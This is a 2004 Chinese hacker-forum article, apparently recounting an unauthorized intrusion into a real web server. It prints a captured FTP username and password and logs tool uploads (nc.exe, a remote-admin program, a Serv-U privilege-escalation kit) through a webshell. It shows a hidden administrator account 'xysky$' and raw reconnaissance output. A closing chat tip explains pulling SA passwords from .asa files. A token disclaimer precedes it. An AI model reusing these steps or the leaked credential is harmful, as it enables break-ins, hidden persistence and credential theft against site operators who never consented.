 |
  |
|
| 首页 | 技术文章 | 软件下载 | 博客 | 论坛 | 精品教程 | 黑客动画 | 视频资源 | 在线服务 | 黑客游戏 | | ||||
 |
|
|||||||
|
||||||||
|
|||||
| 对一个怪网站的渗透记 | |||||
作者:未知 文章来源:CnXHacker.Net 点击数: 更新时间:2004-10-26  |
|||||
|
希望各位只借鉴思路不是叫你去破坏.在脑袋里锻炼入侵我想没人会抓你的. 感谢下雨天发给 嘿嘿 大家别告诉他我 发的啊 没经过他同意就发了 其实感觉思路不错 就扔给大家看看 高手就可以省过去拉 下雨天 希望你看到了不要 K 我啊 对一个怪网站的渗透记录 我的好朋友木鱼黑了这个站,倒,后来给我玩,说提权限,呵呵! http://www.XXXX.com/51.asp maomao www.xxxxx.com [202.109.xx.216] 有防火墙 下一个FLASHFXP 战果 FTP:202.109.xx.199 USER:web10461 PS:SKYYKF752 C:\rad.exe (351390) => /WINNT/system32/rad.exe 成功! 上传完毕!要刷新才能看到效果! C:\桌面\ttt\nc\nc.exe (19488) => /WINNT/system32/nc.exe 成功! 上传完毕!要刷新才能看到效果! 我下了他一个4899的控制文件,我想呵呵,捆绑一下一个批处理或脚本什么来的哈哈! FTP服务,倒,还玩迷惑,呵,我直接看了是5.004的版本,呵用动鲨的本地权限提升算了! D:\Documents and Settings\xysky\桌面\网站作战\dsftp\sportshark.ini (42) => C:/Documents and Settings/All Users/Documents/My Faxes/sportshark.ini 成功! 上传完毕!要刷新才能看到效果! D:\Documents and Settings\xysky\桌面\网站作战\dsftp\sportshark.exe (28672) => C:/Documents and Settings/All Users/Documents/My Faxes/sportshark.exe 成功! 上传完毕!要刷新才能看到效果! 呵呵,不太成呀 D:\WINNT>ftp ftp> opne 202.109.xx.216 1985 Invalid command. ftp> 倒,原来这个本来就可以直接执行了,晕死,可能是防火的太强了哈!! 已经启动以下 Windows 2000 服务: Apache Tomcat 4.1 Automatic Updates Background Intelligent Transfer Service COM+ Event System Computer Browser DefWatch Distributed File System Distributed Link Tracking Client Distributed Transaction Coordinator DNS Client DNS Server EasyMail NT Service Event Log IIS Admin Service IPSEC Policy Agent License Logging Service Logical Disk Manager NT LM Security Support Provider Plug and Play Print Spooler Protected Storage Remote Access Connection Manager Remote Administrator Service Remote Procedure Call (RPC) Removable Storage RunAs Service Security Accounts Manager Serv-U FTP Server Server Sygate Personal Firewall Pro Symantec AntiVirus Client System Event Notification Task Scheduler TCP/IP NetBIOS Helper Service Telephony Terminal Services Windows Management Instrumentation Windows Management Instrumentation Driver Extensions Workstation World Wide Web Publishing Service 命令成功完成。 别名 administrators 注释 管理员对计算机/域有不受限制的完全访问权 成员 ------------------------------------------------------------------------------- 1 Administrator NetShowServices TsInternetUser xysky$ 命令成功完成。 TCP 0.0.0.0:1098 0.0.0.0:0 LISTENING 我兄弟的RAD 成功,怎么连不上 TCP 0.0.0.0:1984 0.0.0.0:0 LISTENING 这也是呀,倒不可能两个一起运行,难道是两台机! TCP 0.0.0.0:8080 0.0.0.0:0 LISTENING TCP 0.0.0.0:3389 0.0.0.0:0 LISTENING 上面好多人连25 是个邮件服务器呵 TCP 202.109.xx.216:1080 202.109.xx.199:1433 ESTABLISHED 好怪 Windows 2000 IP Configuration Host Name . . . . . . . . . . . . : cw3 Primary DNS Suffix . . . . . . . : shhero.com Node Type . . . . . . . . . . . . : Broadcast IP Routing Enabled. . . . . . . . : No WINS Proxy Enabled. . . . . . . . : No DNS Suffix Search List. . . . . . : shhero.com Ethernet adapter 本地连接: Connection-specific DNS Suffix . : Description . . . . . . . . . . . : Intel(R) PRO/1000 MT Desktop Adapter Physical Address. . . . . . . . . : 00-0C-76-7D-FD-18 DHCP Enabled. . . . . . . . . . . : No IP Address. . . . . . . . . . . . : 202.109.xx.200 Subnet Mask . . . . . . . . . . . : 255.255.255.224 IP Address. . . . . . . . . . . . : 202.109.xx.216 Subnet Mask . . . . . . . . . . . : 255.255.255.224 Default Gateway . . . . . . . . . : 202.109.xx.193 DNS Servers . . . . . . . . . . . : 202.96.209.5 202.96.209.133 驱动器 C 中的卷没有标签。 卷的序列号是 4C50-D081 C:\WINNT\system32 的目录 2004-10-16 07:31 . 2004-10-16 07:31 .. 2003-12-18 12:27 304 $winnt$.inf 1900-10-29 04:00 2,151 12520437.cpx 1900-10-29 04:00 2,233 12520850.cpx 1900-10-29 04:00 32,016 aaaamon.dll 1900-10-29 04:00 67,344 access.cpl 2002-08-29 09:25 64,512 acctres.dll 2003-06-19 12:05 150,800 accwiz.exe 1900-10-29 04:00 61,952 acelpdec.ax type c:\boot.ini [boot loader] timeout=1 default=multi(0)disk(0)rdisk(0)partition(1)\WINNT [operating systems] multi(0)disk(0)rdisk(0)partition(1)\WINNT="Microsoft Windows 2000 Advanced Server" /fastdetect C:\port\fport.exe (114688) => /WINNT/system32/fport.exe 成功! 上传完毕!要刷新才能看到效果! dir fport.exe /s 驱动器 C 中的卷没有标签。 卷的序列号是 4C50-D081 差点没晕死,我还以为管理员什么限制都没呵呵 202.109.XX.198 202.109.xx.216 我下载了一个LOG文件,发现这两个IP 倒,呵! 发现网络真是越来越复杂了,想渗透,呵呵! 发现上传的动鲨的东西在这里,说明这个文件夹可以用来提升权限呵呵! C:\port\fport.exe (114688) => /Documents and Settings/All Users/Documents/My Faxes/fport.exe 成功! 上传完毕!要刷新才能看到效果! 晕,再发现我用命令可以进C:\WINNT\system32 的目录就是进不了这个 /Documents and Settings 再退出来用CD\也不行,还是在C:\WINNT\system32下,倒! 以上都是用CMD.asp来的 下面用SQL试一下吧,晕 C:\Documents and Settings\All Users\Documents\DrWatson-----0 C:\Documents and Settings\All Users\Documents\My Music-----0 怪了,另一个文件夹怎么没显示呢?呵,是不是隐藏了! 扫了一下不行,倒了!显示主机为0,是不是真的呀!扫他周围算了 某某蛋说是两个CPU ,我以为是两个网卡呢!! 补充一下: 看到一些人直接得到webshell后找一些关键的文件来得到进一步的信息如SA的密码之类的 ,一般有哪类的文件 某某蛋... 13:55:59 一般是asa的 然后使用include插入到相关页面 建立recordset连接 下雪天 13:47:00 这个网站是我兄弟黑的哈 下雪天 13:47:11 恩,我记下了 某某蛋... 13:56:30 哦 我加入你们吧 大家互相学习啊 某某蛋-是我隐藏的因为不知道他愿意不愿意把名字留下 所以就暂时叫某某蛋把 呵呵对不起了啊兄弟委屈你了。 |
|||||
| 文章录入:IceRiver 责任编辑:IceRiver | |||||
| 【发表评论】【加入收藏】【告诉好友】【打印此文】【关闭窗口】 | |||||
| 最新热点 | 最新推荐 | 相关文章 | ||
| 对一台虚拟主机服务器的渗透 微软携安全厂商建统一战线 M 警惕:又一个通过 MSN传播的 杀毒软件网络防火墙一个都不 asp+语法介绍(二)-书写我们 shell编程例子 -- 一个简单的 shell编程例子 -- 一个.cshr shell编程例子 -- 一个.logi 探密QQ登陆加密算法兼谈简单 一个最优的算法 |
 网友评论:(只显示最新5条。评论内容只代表网友观点,与本站立场无关!) |
 |
|
| 关于我们 - 版权声明 - 帮助(?) - 广告服务 - 联系我们 - 友情链接 - 用户注册 - | Powered by ICE RIVER - STUDIO |
|
|
| » CnXHacker.CoM |  |
© CopyRight 2002-2006, CnXHacker.CoM™, Inc. All Rights Reserved. |
